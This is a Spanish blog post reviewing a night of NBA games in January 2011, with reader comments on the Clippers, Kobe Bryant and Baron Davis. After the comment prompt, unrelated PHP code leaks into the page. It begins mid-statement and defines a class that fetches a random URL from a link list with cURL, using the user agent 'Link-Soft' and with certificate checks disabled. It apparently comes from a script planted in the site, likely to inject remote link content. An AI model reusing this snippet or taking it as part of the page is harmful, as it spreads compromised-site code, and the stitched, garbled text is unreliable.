La Crónica (12/01/2011)

13 de January de 2011 por TheDeerHunter

Día “I love this game!!” en los USA. Mucho espectáculo y emoción.

El Showtime ha vuelto al Staples. Pero lo hace de la mano del hermano pobre de L.A. Si alguien se preguntaba si los Heat iban a aguantar de líderes en el Este lo que queda de temporada la respuesta es no y la culpa la tuvieron La Bestia Griffin, Eric Gordon y la legendaria sonrisa de jugón de Baron Davis, que vuelve a armarla como antaño. LeBron será “la creme de la creme” pero ya no sonríe tanto. Medio planeta saltó del sofá con el pedazo de mate de Griffin que dejaba en nada el partidazo de los beach boys y rompía la racha. El Elegido ya no es el ex-cavalier sino que es el 32 Clipper, al menos para el público que no es seguidor de Miami. Y eso que niega que el tweet de ayer fuera suyo.

Los Celtics recuperaron su estatus destrozando sin contemplaciones a los Kings y aprovechándose de las derrotas de todos sus contendientes. Orlando tropezaba en New Orleans en el tiempo extra por culpa del primer partido malo allí de Turkoglu, unido a la mala actuación de Nelson, Arenas, Redick, Bass junto al inmenso partido de Marcus Thornton volviendo a parecerse al del año pasado. Los Bulls también cayeron en Charlotte con DJ Augustin tocando la guitarra en memoria de Larry Brown y los Knicks cayeron en Salt Lake en un partidaco de 256 puntos a pesar de la actuación de Shawne Williams y Bill Walker.

Los únicos que se llevaron el gato al agua ayer en el Este fueron los Hawks en Toronto, con 36 de Crawford y 26 de Joe Johnson, y los Pacers contra los mermados Mavs.

En el Oeste los Spurs mantienen cómodamente la posición de líder. Ayer ganaron al tran tran a los Bucks, que van poco a poco recuperando gente. Los Lakers cuajaron un último cuarto memorable (46 puntos) para remontar un choque a los Warriors que tenían muy cuesta arriba, con un Kobe celestial.

Oklahoma ganó a Houston, Memphis a Detroit y Phoenix tumbó a los Nets, pero sólo en la prórroga.

MVP: Randolph estuvo monstruoso en Detroit, con 34 puntos, 17 rebotes, 2 asistencias, 2 rebotes y 1 tapón… pero cualquiera que haya visto a Kobe volar esta noche sabe muy bien quién es el MVP de la jornada. 39 puntos, 6 rebotes, 4 asistencias y 3 robos tomando la responsabilidad como sólo el mejor jugador del mundo sabe hacerlo.

El rookie: Es la noche grande de Blake Griffin. ¿Será posible que un sólo hombre revierta la dinámica perdedora de una franquicia gafada como son los Clippers?

La sorpresa: Entre Shawne Williams y Bill Walker 48 puntos a Utah. Aun así perdieron… no se puede tener todo.

La decepción: 2 de 10 Turkoglu, 2 de 11 Redick, 1 de 9 Nelson… y aún así Arenas jugó sólo 14 minutos. Ese es el tipo de cosas por el que la gente se queja de la gestión que hace Van Gundy de su plantilla.

El mayor esfuerzo en vano: 31 Wade, 27 LeBron, 26 Bosh. Es muy duro perder un partido como este.

Comenta

17 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Gran jornada y grandes estos Clippers que están sorprendiendo a propios y extraños haciendo posible lo que hace unos meses se antojaba imposible (hasta Baron Davis han resucitado para la causa).

    A los Bobcats les ha sentado de maravilla el cambio de coach,Atlanta sigue imparable desde que Crawford esta ” aJordanado”,en Dallas más les vale que vuelva Nowitzi cuanto antes.
    De Kobe ya esta todo dicho,el numero uno,sacando adelante un partido trabado hasta el ultimo cuarto.
    Aunque yo me quedo con la canasta de Boykins delante del mismísimo Duncan,sencillamente genial,JUGON!!

      Citar

  2. HeiNeKeN dice:
    #2

    Baron Davis me esta callando la boca completamente, hace tiempo comente por aqui que debian darle mayor protagonismo a Bledsoe y quitarselo a Davis. Pues me retracto de lo dicho, y no porque Bledsoe este haciendo malos partidos (ojito a los dos taponazos de hoy del chaval), sino porque este Davis parece el de los Warriors de hace tiempo.

    Genial el enfrentamiento Griffin vs Wade, el chaval demostrando que nadie se mete con el por muy rookie que sea y luego le clava un mate a Wade pese al palo que este le suelta.

      Citar

  3. MagicJohnson32 dice:
    #3

    Ahora es cuando yo me pongo la medallita y os recuerdo que dije hace 3 ó 4 días que Baron Davis había vuelto, jeje.

    Ah, los Heat pierden y LeBron se lesiona. Va a ser verdad que el “Karma is a b****” juas juas…

      Citar

  4. sergio dice:
    #4

    Me da rabia ver como los Clippers estan a 7 victorias de los Playoffs y los Nets a 5. Las sensaciones de uno y otro distan un mundo

      Citar

  5. Denise dice:
    #5

    Pues yo aprovecharía el moment,o pondría a Baron Davis en el mercado y buscaría algo apañado por él. Baron es un jugón, pero nunca me ha inspirado confianza, ya mismo se lesionará o volverá a desaparecer misteriosamente del mapa.
    Vaya duelo Bryant-Ellis, y vaya temporadón el de Dorrell Wright, cuajando partidazos como el de ayer, y promediando un 17-6-3 con más del 40% en tiros de campo y en triples. Debe ser el jugador que más ha mejorado respecto al año pasado.
    Si más pronto hablámos de la irregularidad de algunos jugadores de Orlando…., lo positivo es que aún haciendo la mitad del equipo un horrible partido, hubo opciones de ganarlo hasta el final. Howard y su 29-20 también podría haberse metido en el mayor esfuerzo en vano.

      Citar

  6. TheDeerHunter dice:
    #6

    Pues sí, Denise… muy cierto lo de Howard. De hecho había pensado ponerlo pero a la hora de la verdad se me ha pasado.

      Citar

  7. Scriers dice:
    #7

    Los Clippers hoy por hoy, gracias a la Griffinmanía y a todos los que se han subido al carro, son el equipo más interesante de ver en la liga. Por lo imprevisible, pueden ganar a Miami y perder el próximo contra Sacramento. Por lo demás, vaya suerte tuvieron los Hawks metiendo triples estratosféricos (Bibby y Crawford), qué manera de ganar. Yo ayer no pude ver nada por internet, no se aún porqué, pero nada funcionaba.

      Citar

  8. TheDeerHunter dice:
    #8

    Con un 7-3 en sus últimos 10 u 8-3 en sus últimos 11. Los Clippers son brillantes terceros del Oeste en este último periodo de la temporada.
    Con Baron Davis subido al carro y la vuelta de Kaman los 5 partidos de diferencia con los Blazers (les han sacado 2-3 en los últimos 10-11) parecen asequibles. Con todo no creo que lleguen a lograrlo… y si a Sergio le fastidia que los Nets tengan más a tiro los playoffs que ellos, todavía le sangrará la más la úlcera si los Bobcats sí están dentro con sólo 3 derrotas menos. Al menos estos últimos también están jugando bien últimamente.

      Citar

  9. Denise dice:
    #9

    Clippers playoffs? Imposible.
    Apuesto a que los Rockets acaban metiendose en PO, los Blazers quizás tampoco aguanten, pero los Grizzleies están ahi al acecho, y para mí, son más equipo que los Clippers a día de hoy.

      Citar

  10. TheDeerHunter dice:
    #10

    Pues lo que queda de enero es un calendario cómodo que no te extrañe pudiera apretar mucho las cosas para sus rivales. Los dos partidos contra Blazers y Rockets definirán sus esperanzas de lucha.
    El problema viene en Febrero con únicamente dos partidos en casa contra Celtics y Bulls y todo lo demás fuera. Creo que sólo han ganado 3 partidos foráneos esta temporada.
    Qué lástima de principio…

      Citar

  11. CAMPO2 dice:
    #11

    Yo a Davis no lo vendo ni loco, y la vuelta de kaman no se puede beneficiar o ser para peor

      Citar

  12. Viva_Dirk dice:
    #12

    Algo mejor que Davis dudo que vayan a conseguir por el, lo que si podria llegar es alguien mas fiable que es algo que realmente le hace falta al equipo, un destino perfecto para terminar la carrera de Nash.

      Citar

  13. sergio dice:
    #13

    Baron Davis es de los unicos bases de la liga que puede hacer de todo, y todo bien. Otra cosa es que quiera. Es un riesgo desde luego y a ver como les sale.

    Claro que me duele la úlcera Deer… la tengo sangrante. Aún así yo tampoco creo que los Clippers lleguen a los Playoffs. La clave está, como mencionas, en su falta de victorias fuera de casa. Y encima dentro de poco tienen una gira de 11!! partidos fuera de casa. Cuando termine esa serie de partidos quizas podamos hablar con mas propiedad de ellos no??

      Citar

  14. sergio dice:
    #14

    Ah! y ya que a mi se me olvida muchas veces hablar de él y está haciendo una enorme temporada, es justo que hable de la magnifica temporada de Ray Allen. Parece que no está haciendo nada y esta consiguiendo los mejores numeros desde que llegó a Boston (obviamente el incremento de calidad de Rondo y las bajas tambien ayudan… )

      Citar

  15. MagicJohnson32 dice:
    #15

    sergio, sobre eso último que dices, muy buen apunte sobre Ray. Ojo que dices que el “incremento de calidad de Rondo” ayuda a los números de Allen, pero creo que también hay una buena parte de lo contrario: el tremendo acierto de Allen ayuda a las cifras de asistencias que está firmando Rondo. En cualquier caso, gran temporada de ambos.

      Citar

  16. MagicJohnson32 dice:
    #16

    Acabo de ver el LAL-GSW y qué pasada de final. Descomunal Kobe, un escándalo: el vídeo de sus últimos 5 minutos.

      Citar

  17. TheDeerHunter dice:
    #17

    Cuando Kobe pone esa mirada… no queda otra que rendirse.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>